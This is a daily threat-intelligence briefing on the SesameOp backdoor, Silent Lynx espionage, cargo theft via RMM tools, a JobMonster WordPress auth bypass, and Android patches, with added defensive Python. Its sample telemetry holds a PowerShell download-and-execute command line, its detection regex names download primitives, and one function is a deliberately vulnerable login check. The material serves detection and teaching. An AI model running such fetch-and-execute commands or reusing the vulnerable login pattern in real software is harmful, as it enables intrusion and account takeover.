Daily Threat Briefing

Cyware Daily Threat Intelligence, November 04, 2025


Attackers are hiding malicious traffic in plain sight by routing it through popular AI services. A sophisticated backdoor named SesameOp abuses OpenAI's API as a command-and-control relay: the malware fetches encrypted commands for espionage through a legitimate, widely used endpoint, so the traffic blends in with ordinary web activity. This is misuse of the service rather than a flaw in it, which means the tell is which process is talking to the API, not the destination itself.

As diplomatic summits convene, a cyber-espionage campaign is working in the shadows. The Silent Lynx APT group is actively targeting Central Asian nations, Russia, and China with spear-phishing attacks.

Vulnerabilities that need no action from the user are among the most dangerous. Google's November Android security update patches two critical flaws in the System component, including one that could allow remote code execution without user interaction. The update also marks Google's shift to a single security patch level for its partners.

Top Malware Reported in the Last 24 Hours

Attackers target trucking firms with RMM tools

Cybercriminals are increasingly targeting trucking and logistics companies to steal physical cargo through multi-stage intrusions. Abusing the industry's dependence on online load boards and remote-access tooling, the attackers deploy RMM tools to gain and keep unauthorized access. With that access they compromise load board accounts, post fake shipments and bid on real loads under a legitimate carrier's identity, then divert and steal the cargo. Unexpected RMM installs on dispatch or broker workstations are the early indicator to watch for. The trend has caused significant financial losses; cargo theft costs the industry approximately $34 billion annually.

New SesameOp backdoor discovered

Microsoft has detailed a sophisticated backdoor named SesameOp that abuses OpenAI's API for stealthy C2 communications. The malware is designed to maintain persistence and covertly manage compromised devices, supporting long-term espionage. The infection chain consists of a loader component and a .NET-based backdoor that uses the OpenAI API to fetch and execute encrypted commands and to return the results to the attackers over the same channel. The loader DLL is heavily obfuscated to evade detection. Because the destination is a legitimate service, network-layer blocking alone will not catch it; process-attributed network telemetry (which binary opened the connection) is needed.

Silent Lynx APT targets Central Asia

The Silent Lynx APT group has been actively targeting Central Asian nations, Russia, and China for espionage. The group uses spear-phishing campaigns and custom implants to infiltrate government and critical infrastructure organizations. Two campaigns stand out: one focused on Russia-Azerbaijan relations during a summit in Dushanbe, the other on China-Central Asia relations during a summit in Astana. The research shows malicious RAR archives containing LNK files that execute PowerShell scripts fetched from GitHub. Silent Lynx uses tools such as Silent Loader, the LAPLAS implant (TCP and TLS variants), and SilentSweeper (a .NET-based implant) to deploy reverse shells and maintain persistence.
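Both the Silent Lynx chain (LNK launching PowerShell that pulls a script from GitHub) and the SesameOp chain (a backdoor talking to api.openai.com) are cases where the destination looks benign and the process context is the signal. The following is an added example, not code from Microsoft, the Silent Lynx research, or Cyware: two triage rules run over constructed endpoint telemetry. The event shape, the hostnames and the allowlist of processes permitted to call the OpenAI API are assumptions for the example.

```python
"""Two triage rules over constructed endpoint telemetry (added example, not
code from any vendor report).

Rule 1 (Silent Lynx pattern): PowerShell process creation whose command line
downloads from a GitHub host, with extra weight when the parent is what an
LNK double-click or archive tool launch looks like.

Rule 2 (SesameOp pattern): a network connection to api.openai.com from a
process that is not on the fleet's allowlist of expected API clients.
"""
from dataclasses import dataclass
import re

# Standard GitHub hosts; GitHub is the fetch origin named in the Silent Lynx summary.
GITHUB_HOSTS = ("github.com", "raw.githubusercontent.com", "gist.githubusercontent.com")
OPENAI_API_HOST = "api.openai.com"
# Assumed allowlist: processes that legitimately call the OpenAI API in this fleet.
OPENAI_ALLOWED_PROCS = {"chrome.exe", "msedge.exe", "firefox.exe", "code.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives and aliases.
DOWNLOAD_RE = re.compile(
    r"(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|curl|wget)",
    re.I,
)
# Parents that indicate a user launched the LNK from Explorer or from the archive tool.
LNK_STYLE_PARENTS = {"explorer.exe", "winrar.exe", "7zfm.exe"}


@dataclass
class Event:
    kind: str            # "process" (creation) or "network" (outbound connection)
    host: str            # endpoint name
    process: str         # image name that was created / opened the connection
    parent: str = ""     # parent image name (process events)
    cmdline: str = ""    # full command line (process events)
    dest: str = ""       # destination hostname (network events)


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def github_hosts_in(cmdline: str) -> list:
    lc = cmdline.lower()
    return [h for h in GITHUB_HOSTS if h in lc]


def rule_powershell_github_download(ev: Event):
    """Rule 1: PowerShell fetching a script from GitHub."""
    if ev.kind != "process" or ev.process.lower() not in POWERSHELL:
        return None
    hits = github_hosts_in(ev.cmdline)
    if not hits or not DOWNLOAD_RE.search(ev.cmdline):
        return None
    sev = "high" if ev.parent.lower() in LNK_STYLE_PARENTS else "medium"
    return Alert("powershell_github_download", ev.host,
                 f"{sev}: {ev.parent} -> {ev.process} fetching from {hits[0]}")


def rule_openai_api_unexpected_process(ev: Event):
    """Rule 2: OpenAI API reached by a process outside the allowlist."""
    if ev.kind != "network" or ev.dest.lower() != OPENAI_API_HOST:
        return None
    if ev.process.lower() in OPENAI_ALLOWED_PROCS:
        return None
    return Alert("openai_api_unexpected_process", ev.host,
                 f"{ev.process} connected to {OPENAI_API_HOST}")


RULES = (rule_powershell_github_download, rule_openai_api_unexpected_process)


def triage(events):
    """Run every rule over every event; return the alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample telemetry (not real logs). Paths and names are invented.
SAMPLE_EVENTS = [
    Event("process", "ws-101", "powershell.exe", parent="explorer.exe",
          cmdline='powershell.exe -w hidden -c "iwr https://raw.githubusercontent.com/x/y/main/s.ps1 | iex"'),
    Event("process", "ws-102", "powershell.exe", parent="cmd.exe",
          cmdline="powershell.exe -File C:\\scripts\\inventory.ps1"),
    Event("network", "ws-104", "chrome.exe", dest="api.openai.com"),
    Event("network", "ws-105", "updater.exe", dest="api.openai.com"),
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.host}: {a.detail}")
```

Rule 2 only works on telemetry that attributes connections to a process (EDR, Sysmon network events, or a proxy that records the client binary); at the network layer, SesameOp's TLS sessions to api.openai.com are indistinguishable from a developer's. Whether to block the API outright is a policy decision, not a detection one.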

Top Vulnerabilities Reported in the Last 24 Hours

Actively exploited bug in JobMonster WP theme

Hackers are exploiting a critical authentication bypass vulnerability (CVE-2025-5397) in the JobMonster WordPress theme that grants access to administrator accounts when social login is enabled. The flaw arises because the theme's check_login() function does not properly verify a user's identity, so an unauthenticated attacker can bypass authentication. Exploitation typically requires knowing the target administrator's username or email. The vulnerability affects all versions of the theme up to 4.8.1 and carries a critical CVSS score of 9.8. Wordfence identified the malicious activity and has blocked multiple exploit attempts against its customers in recent days. Sites running an affected version should update beyond 4.8.1, or disable social login until they can, since the bypass depends on that feature being enabled.
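The bug class the summary describes is a social-login handler that logs in whoever owns a client-supplied identifier without checking the identity provider's proof. The following is an added illustration of that class, written for this briefing; it is not the JobMonster theme's check_login() and makes no claim about how the theme's code is actually written. The user table, the request shape and the HMAC-based provider assertion (a stand-in for a real OAuth/OIDC token check) are all constructed for the example.

```python
"""Hypothetical social-login handler: vulnerable form beside a hardened form.
Added example for this briefing; not the JobMonster theme's code.
"""
import hashlib
import hmac

# Constructed user table keyed by the email a social provider would assert.
USERS = {
    "admin@example.com": {"login": "admin", "role": "administrator"},
    "alice@example.com": {"login": "alice", "role": "subscriber"},
}

# Assumption: a secret shared with the identity provider, used here as a stand-in
# for verifying a signed ID token from the provider.
PROVIDER_SECRET = b"demo-shared-secret"


def vulnerable_check_login(request: dict):
    """Logs in whoever owns the email the client claims.

    Nothing proves the client actually authenticated with the provider, so
    knowing an administrator's email is enough to become that administrator.
    Returns the login name of the account that was signed in, or None.
    """
    user = USERS.get(request.get("email"))
    return user["login"] if user else None


def provider_sign(email: str) -> str:
    """What the (assumed) identity provider attaches to an email it has verified."""
    return hmac.new(PROVIDER_SECRET, email.encode(), hashlib.sha256).hexdigest()


def hardened_check_login(request: dict):
    """Only signs in an email that arrives with a valid provider assertion.

    The assertion is checked before the user lookup, with a constant-time
    comparison, so an attacker who knows the email but lacks the provider's
    signature gets nothing.
    """
    email = request.get("email")
    sig = request.get("provider_sig", "")
    if not email or not hmac.compare_digest(sig, provider_sign(email)):
        return None
    user = USERS.get(email)
    return user["login"] if user else None


# Constructed attacker request: knows the admin email, has no provider assertion.
ATTACK_REQUEST = {"email": "admin@example.com"}
# Constructed legitimate request carrying a genuine provider assertion.
LEGIT_REQUEST = {"email": "alice@example.com",
                 "provider_sig": provider_sign("alice@example.com")}

if __name__ == "__main__":
    print("vulnerable, attacker:", vulnerable_check_login(ATTACK_REQUEST))
    print("hardened, attacker:  ", hardened_check_login(ATTACK_REQUEST))
    print("hardened, legit:     ", hardened_check_login(LEGIT_REQUEST))
```

In a real integration the assertion check is the provider's signed token (validated signature, issuer, audience and expiry), and the asserted email should only be trusted for accounts that were previously linked to that provider identity; the structure of the fix is the same, verify the proof before touching the user table.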

Android patches critical RCE flaw

Google's November 2025 Android security update addresses two critical vulnerabilities in the System component. The more serious, CVE-2025-48593, could enable remote code execution without user interaction and affects Android 13 through 16. The second, CVE-2025-48581, affects Android 16 and could lead to local privilege escalation. The update also replaces the traditional two-tier security patch level scheme with a single patch level, simplifying the process for vendors. No active exploitation of either vulnerability has been reported. The bulletin does not include patches for Google Play system updates, Automotive OS, or Wear OS, so those ship on their own schedules.
